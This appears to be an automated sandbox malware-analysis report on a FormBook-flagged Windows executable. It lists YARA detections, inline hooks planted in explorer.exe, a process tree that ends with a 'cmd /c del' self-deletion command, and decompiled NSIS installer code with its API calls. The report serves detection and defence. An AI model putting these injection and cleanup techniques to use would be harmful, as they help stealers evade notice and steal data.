                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function Name | Hook Type | Active in Processes
                                      PeekMessageA | INLINE | explorer.exe
                                      PeekMessageW | INLINE | explorer.exe
                                      GetMessageW | INLINE | explorer.exe
                                      GetMessageA | INLINE | explorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function Name | Hook Type | New Data
                                      PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE1
                                      PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE1
                                      GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE1
                                      GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE1

                                      Statistics

                                      CPU Usage

                                      Memory Usage

                                      High Level Behavior Distribution

                                      Behavior

                                      System Behavior

                                      General

                                      Start time: 12:26:42
                                      Start date: 08/04/2021
                                      Path: C:\Users\user\Desktop\Y4U48592345670954.exe
                                      Wow64 process (32bit): true
                                      Commandline: 'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase: 0x400000
                                      File size: 227550 bytes
                                      MD5 hash: E8E69391D3A931E6638ADAEBF6A339F6
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation: low

                                      General

                                      Start time: 12:26:43
                                      Start date: 08/04/2021
                                      Path: C:\Users\user\Desktop\Y4U48592345670954.exe
                                      Wow64 process (32bit): true
                                      Commandline: 'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase: 0x400000
                                      File size: 227550 bytes
                                      MD5 hash: E8E69391D3A931E6638ADAEBF6A339F6
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation: low

                                      General

                                      Start time: 12:26:46
                                      Start date: 08/04/2021
                                      Path: C:\Windows\explorer.exe
                                      Wow64 process (32bit): false
                                      Commandline:
                                      Imagebase: 0x7ff6fee60000
                                      File size: 3933184 bytes
                                      MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high

                                      General

                                      Start time: 12:26:57
                                      Start date: 08/04/2021
                                      Path: C:\Windows\SysWOW64\NETSTAT.EXE
                                      Wow64 process (32bit): true
                                      Commandline: C:\Windows\SysWOW64\NETSTAT.EXE
                                      Imagebase: 0xdd0000
                                      File size: 32768 bytes
                                      MD5 hash: 4E20FF629119A809BC0E7EE2D18A7FDB
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation: moderate

                                      General

                                      Start time: 12:27:02
                                      Start date: 08/04/2021
                                      Path: C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit): true
                                      Commandline: /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase: 0x11d0000
                                      File size: 232960 bytes
                                      MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high

                                      General

                                      Start time: 12:27:02
                                      Start date: 08/04/2021
                                      Path: C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit): false
                                      Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase: 0x7ff724c50000
                                      File size: 625664 bytes
                                      MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high

                                      Disassembly

                                      Code Analysis


                                        Executed Functions

                                        C-Code - Quality: 86%
                                        			_entry_() {
                                        				struct _SHFILEINFOA _v356;
                                        				long _v372;
                                        				char _v380;
                                        				int _v396;
                                        				CHAR* _v400;
                                        				signed int _v404;
                                        				signed int _v408;
                                        				char _v416;
                                        				intOrPtr _v424;
                                        				intOrPtr _t31;
                                        				void* _t36;
                                        				CHAR* _t41;
                                        				signed int _t43;
                                        				CHAR* _t46;
                                        				signed int _t48;
                                        				int _t52;
                                        				signed int _t56;
                                        				void* _t78;
                                        				CHAR* _t89;
                                        				signed int _t90;
                                        				void* _t91;
                                        				CHAR* _t96;
                                        				signed int _t97;
                                        				signed int _t99;
                                        				signed char* _t103;
                                        				CHAR* _t105;
                                        				signed int _t106;
                                        				void* _t108;
                                        
                                        				_t99 = 0;
                                        				_v372 = 0;
                                        				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
                                        				_v380 = 0x20;
                                        				__imp__#17();
                                        				__imp__OleInitialize(0); // executed
                                        				 *0x7a3030 = _t31;
                                        				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
                                        				E004059BF(0x7a2780, "NSIS Error");
                                        				_t89 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                        				GetTempPathA(0x400, _t89);
                                        				_t36 = E00403116(_t108);
                                        				_t109 = _t36;
                                        				if(_t36 != 0) {
                                        					L2:
                                        					_t96 = "\"C:\\Users\\jones\\Desktop\\Y4U48592345670954.exe\" ";
                                        					DeleteFileA(_t96); // executed
                                        					E004059BF(_t96, GetCommandLineA());
                                        					 *0x7a2f80 = GetModuleHandleA(0);
                                        					_t41 = _t96;
                                        					if("\"C:\\Users\\jones\\Desktop\\Y4U48592345670954.exe\" " == 0x22) {
                                        						_v404 = 0x22;
                                        						_t41 =  &M007A9001;
                                        					}
                                        					_t43 = CharNextA(E004054F7(_t41, _v404));
                                        					_v408 = _t43;
                                        					while(1) {
                                        						_t91 =  *_t43;
                                        						_t112 = _t91;
                                        						if(_t91 == 0) {
                                        							break;
                                        						}
                                        						__eflags = _t91 - 0x20;
                                        						if(_t91 != 0x20) {
                                        							L7:
                                        							__eflags =  *_t43 - 0x22;
                                        							_v404 = 0x20;
                                        							if( *_t43 == 0x22) {
                                        								_t43 = _t43 + 1;
                                        								__eflags = _t43;
                                        								_v404 = 0x22;
                                        							}
                                        							__eflags =  *_t43 - 0x2f;
                                        							if( *_t43 != 0x2f) {
                                        								L17:
                                        								_t43 = E004054F7(_t43, _v404);
                                        								__eflags =  *_t43 - 0x22;
                                        								if(__eflags == 0) {
                                        									_t43 = _t43 + 1;
                                        									__eflags = _t43;
                                        								}
                                        								continue;
                                        							} else {
                                        								_t43 = _t43 + 1;
                                        								__eflags =  *_t43 - 0x53;
                                        								if( *_t43 == 0x53) {
                                        									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
                                        									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
                                        										_t99 = _t99 | 0x00000002;
                                        										__eflags = _t99;
                                        									}
                                        								}
                                        								__eflags =  *_t43 - 0x4352434e;
                                        								if( *_t43 == 0x4352434e) {
                                        									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
                                        									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
                                        										_t99 = _t99 | 0x00000004;
                                        										__eflags = _t99;
                                        									}
                                        								}
                                        								__eflags =  *(_t43 - 2) - 0x3d442f20;
                                        								if( *(_t43 - 2) == 0x3d442f20) {
                                        									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
                                        									__eflags = _t43 + 2;
                                        									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t43 + 2);
                                        									L22:
                                        									_t46 = E00402C37(_t112, _t99); // executed
                                        									_t105 = _t46;
                                        									if(_t105 != 0) {
                                        										L32:
                                        										E00403501();
                                        										__imp__OleUninitialize();
                                        										if(_t105 == 0) {
                                        											__eflags =  *0x7a3014;
                                        											if( *0x7a3014 != 0) {
                                        												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
                                        												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
                                        												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
                                        												__eflags = _t106;
                                        												if(_t106 != 0) {
                                        													__eflags = _t97;
                                        													if(_t97 != 0) {
                                        														__eflags = _t90;
                                        														if(_t90 != 0) {
                                        															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
                                        															__eflags = _t56;
                                        															if(_t56 != 0) {
                                        																 *_t97(0, "SeShutdownPrivilege",  &_v400);
                                        																_v416 = 1;
                                        																_v404 = 2;
                                        																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
                                        															}
                                        														}
                                        													}
                                        												}
                                        												_t52 = ExitWindowsEx(2, 0);
                                        												__eflags = _t52;
                                        												if(_t52 == 0) {
                                        													E00401410(9);
                                        												}
                                        											}
                                        											_t48 =  *0x7a302c;
                                        											__eflags = _t48 - 0xffffffff;
                                        											if(_t48 != 0xffffffff) {
                                        												_v396 = _t48;
                                        											}
                                        											ExitProcess(_v396);
                                        										}
                                        										E004052BF(_t105, 0x200010);
                                        										ExitProcess(2);
                                        									}
                                        									if( *0x7a2f94 == _t46) {
                                        										L31:
                                        										 *0x7a302c =  *0x7a302c | 0xffffffff;
                                        										_v396 = E00403526();
                                        										goto L32;
                                        									}
                                        									_t103 = E004054F7(_t96, _t46);
                                        									while(_t103 >= _t96) {
                                        										__eflags =  *_t103 - 0x3d3f5f20;
                                        										if(__eflags == 0) {
                                        											break;
                                        										}
                                        										_t103 = _t103 - 1;
                                        										__eflags = _t103;
                                        									}
                                        									_t116 = _t103 - _t96;
                                        									_t105 = "Error launching installer";
                                        									if(_t103 < _t96) {
                                        										lstrcatA(_t89, "~nsu.tmp\\");
                                        										CreateDirectoryA(_t89, 0);
                                        										_v404 = _v404 & 0x00000000;
                                        										do {
                                        											 *0x79d940 = 0x22;
                                        											lstrcatA(0x79d940, _t89);
                                        											lstrcatA(0x79d940, "Au_.exe");
                                        											DeleteFileA(0x79d941);
                                        											if(_t105 == 0) {
                                        												goto L43;
                                        											}
                                        											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
                                        												goto L32;
                                        											}
                                        											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
                                        												E00405707(0x79d941, 0);
                                        												if("C:\\Users\\jones\\AppData\\Local\\Temp" == 0) {
                                        													E00405513(0x79e140);
                                        												} else {
                                        													E004059BF(0x79e140, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                        												}
                                        												lstrcatA(0x79d940, "\" ");
                                        												lstrcatA(0x79d940, _v400);
                                        												lstrcatA(0x79d940, " _?=");
                                        												lstrcatA(0x79d940, 0x79e140);
                                        												E004054CC(0x79d940);
                                        												_t78 = E00405247(0x79d940, _t89);
                                        												if(_t78 != 0) {
                                        													CloseHandle(_t78);
                                        													_t105 = 0;
                                        												}
                                        											}
                                        											L43:
                                        											"Au_.exe" =  &("Au_.exe"[1]);
                                        											_v404 = _v404 + 1;
                                        										} while (_v404 < 0x1a);
                                        										goto L32;
                                        									}
                                        									 *_t103 =  *_t103 & 0x00000000;
                                        									_t104 =  &(_t103[4]);
                                        									if(E004055AC(_t116,  &(_t103[4])) == 0) {
                                        										goto L32;
                                        									}
                                        									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                        									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                        									_t105 = 0;
                                        									goto L31;
                                        								}
                                        								goto L17;
                                        							}
                                        						} else {
                                        							goto L6;
                                        						}
                                        						do {
                                        							L6:
                                        							_t43 = _t43 + 1;
                                        							__eflags =  *_t43 - 0x20;
                                        						} while ( *_t43 == 0x20);
                                        						goto L7;
                                        					}
                                        					goto L22;
                                        				}
                                        				GetWindowsDirectoryA(_t89, 0x3fb);
                                        				lstrcatA(_t89, "\\Temp");
                                        				if(E00403116(_t109) == 0) {
                                        					goto L32;
                                        				}
                                        				goto L2;
                                        			}

                                        0x00403153
                                        0x00403156
                                        0x0040315a
                                        0x0040315f
                                        0x00403164
                                        0x0040316b
                                        0x00403171
                                        0x00403187
                                        0x00403197
                                        0x0040319c
                                        0x004031a7
                                        0x004031ad
                                        0x004031b2
                                        0x004031b4
                                        0x004031da
                                        0x004031da
                                        0x004031e0
                                        0x004031ee
                                        0x00403202
                                        0x00403207
                                        0x00403209
                                        0x0040320b
                                        0x00403210
                                        0x00403210
                                        0x00403220
                                        0x00403226
                                        0x0040328f
                                        0x0040328f
                                        0x00403291
                                        0x00403293
                                        0x00000000
                                        0x00000000
                                        0x0040322c
                                        0x0040322f
                                        0x00403237
                                        0x00403237
                                        0x0040323a
                                        0x0040323f
                                        0x00403241
                                        0x00403241
                                        0x00403242
                                        0x00403242
                                        0x00403247
                                        0x0040324a
                                        0x0040327f
                                        0x00403284
                                        0x00403289
                                        0x0040328c
                                        0x0040328e

                                        APIs
                                        • #17.COMCTL32 ref: 00403164
                                        • OleInitialize.OLE32(00000000), ref: 0040316B
                                        • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                          • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                        • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\Y4U48592345670954.exe" ), ref: 004031E0
                                        • GetCommandLineA.KERNEL32 ref: 004031E6
                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 004031F5
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000020), ref: 00403220
                                        • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                        • ExitProcess.KERNEL32 ref: 00403336
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                        • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                        • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                        • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                        • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                        • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                        • CopyFileA.KERNEL32 ref: 004033C1
                                        • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                        • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                        • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                        • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                        • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                        • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                        • ExitProcess.KERNEL32 ref: 004034FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                        • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\Y4U48592345670954.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                        • API String ID: 3079827372-2304860889
                                        • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                        • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                        • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                        • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				struct _WIN32_FIND_DATAA _v332;
                                        				signed int _t37;
                                        				char* _t49;
                                        				signed char _t51;
                                        				signed int _t54;
                                        				signed int _t57;
                                        				signed int _t63;
                                        				signed int _t65;
                                        				void* _t67;
                                        				signed int _t70;
                                        				CHAR* _t72;
                                        				CHAR* _t74;
                                        				char* _t77;
                                        
                                        				_t74 = _a4;
                                        				_t37 = E004055AC(__eflags, _t74);
                                        				_v12 = _t37;
                                        				if((_a8 & 0x00000008) != 0) {
                                        					_t65 = DeleteFileA(_t74); // executed
                                        					asm("sbb eax, eax");
                                        					_t67 =  ~_t65 + 1;
                                        					 *0x7a3008 =  *0x7a3008 + _t67;
                                        					return _t67;
                                        				}
                                        				_t70 = _a8 & 0x00000001;
                                        				__eflags = _t70;
                                        				_v8 = _t70;
                                        				if(_t70 == 0) {
                                        					L5:
                                        					E004059BF(0x7a0588, _t74);
                                        					__eflags = _t70;
                                        					if(_t70 == 0) {
                                        						E00405513(_t74);
                                        					} else {
                                        						lstrcatA(0x7a0588, "\\*.*");
                                        					}
                                        					lstrcatA(_t74, 0x409010);
                                        					_t72 =  &(_t74[lstrlenA(_t74)]);
                                        					_t37 = FindFirstFileA(0x7a0588,  &_v332);
                                        					__eflags = _t37 - 0xffffffff;
                                        					_a4 = _t37;
                                        					if(_t37 == 0xffffffff) {
                                        						L26:
                                        						__eflags = _v8;
                                        						if(_v8 != 0) {
                                        							_t31 = _t72 - 1;
                                        							 *_t31 =  *(_t72 - 1) & 0x00000000;
                                        							__eflags =  *_t31;
                                        						}
                                        						goto L28;
                                        					} else {
                                        						goto L9;
                                        					}
                                        					do {
                                        						L9:
                                        						_t77 =  &(_v332.cFileName);
                                        						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
                                        						__eflags =  *_t49;
                                        						if( *_t49 != 0) {
                                        							__eflags = _v332.cAlternateFileName;
                                        							if(_v332.cAlternateFileName != 0) {
                                        								_t77 =  &(_v332.cAlternateFileName);
                                        							}
                                        						}
                                        						__eflags =  *_t77 - 0x2e;
                                        						if( *_t77 != 0x2e) {
                                        							L16:
                                        							E004059BF(_t72, _t77);
                                        							_t51 = _v332.dwFileAttributes;
                                        							__eflags = _t51 & 0x00000010;
                                        							if((_t51 & 0x00000010) == 0) {
                                        								SetFileAttributesA(_t74, _t51 & 0x000000fe);
                                        								_t54 = DeleteFileA(_t74);
                                        								__eflags = _t54;
                                        								if(_t54 != 0) {
                                        									E00404D62(0xfffffff2, _t74);
                                        								} else {
                                        									__eflags = _a8 & 0x00000004;
                                        									if((_a8 & 0x00000004) == 0) {
                                        										 *0x7a3008 =  *0x7a3008 + 1;
                                        									} else {
                                        										E00404D62(0xfffffff1, _t74);
                                        										E00405707(_t74, 0);
                                        									}
                                        								}
                                        							} else {
                                        								__eflags = (_a8 & 0x00000003) - 3;
                                        								if(__eflags == 0) {
                                        									E00405301(_t72, __eflags, _t74, _a8);
                                        								}
                                        							}
                                        							goto L24;
                                        						}
                                        						_t63 =  *((intOrPtr*)(_t77 + 1));
                                        						__eflags = _t63;
                                        						if(_t63 == 0) {
                                        							goto L24;
                                        						}
                                        						__eflags = _t63 - 0x2e;
                                        						if(_t63 != 0x2e) {
                                        							goto L16;
                                        						}
                                        						__eflags =  *((char*)(_t77 + 2));
                                        						if( *((char*)(_t77 + 2)) == 0) {
                                        							goto L24;
                                        						}
                                        						goto L16;
                                        						L24:
                                        						_t57 = FindNextFileA(_a4,  &_v332);
                                        						__eflags = _t57;
                                        					} while (_t57 != 0);
                                        					_t37 = FindClose(_a4);
                                        					goto L26;
                                        				} else {
                                        					__eflags = _t37;
                                        					if(_t37 == 0) {
                                        						L28:
                                        						__eflags = _v8;
                                        						if(_v8 == 0) {
                                        							L36:
                                        							return _t37;
                                        						}
                                        						__eflags = _v12;
                                        						if(_v12 != 0) {
                                        							_t37 = E00405C94(_t74);
                                        							__eflags = _t37;
                                        							if(_t37 == 0) {
                                        								goto L36;
                                        							}
                                        							E004054CC(_t74);
                                        							SetFileAttributesA(_t74, 0x80);
                                        							_t37 = RemoveDirectoryA(_t74);
                                        							__eflags = _t37;
                                        							if(_t37 != 0) {
                                        								return E00404D62(0xffffffe5, _t74);
                                        							}
                                        							__eflags = _a8 & 0x00000004;
                                        							if((_a8 & 0x00000004) == 0) {
                                        								goto L30;
                                        							}
                                        							E00404D62(0xfffffff1, _t74);
                                        							return E00405707(_t74, 0);
                                        						}
                                        						L30:
                                        						 *0x7a3008 =  *0x7a3008 + 1;
                                        						return _t37;
                                        					}
                                        					__eflags = _a8 & 0x00000002;
                                        					if((_a8 & 0x00000002) == 0) {
                                        						goto L28;
                                        					}
                                        					goto L5;
                                        				}
                                        			}

                                        APIs
                                        • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 0040531F
                                        • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 00405369
                                        • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 0040537C
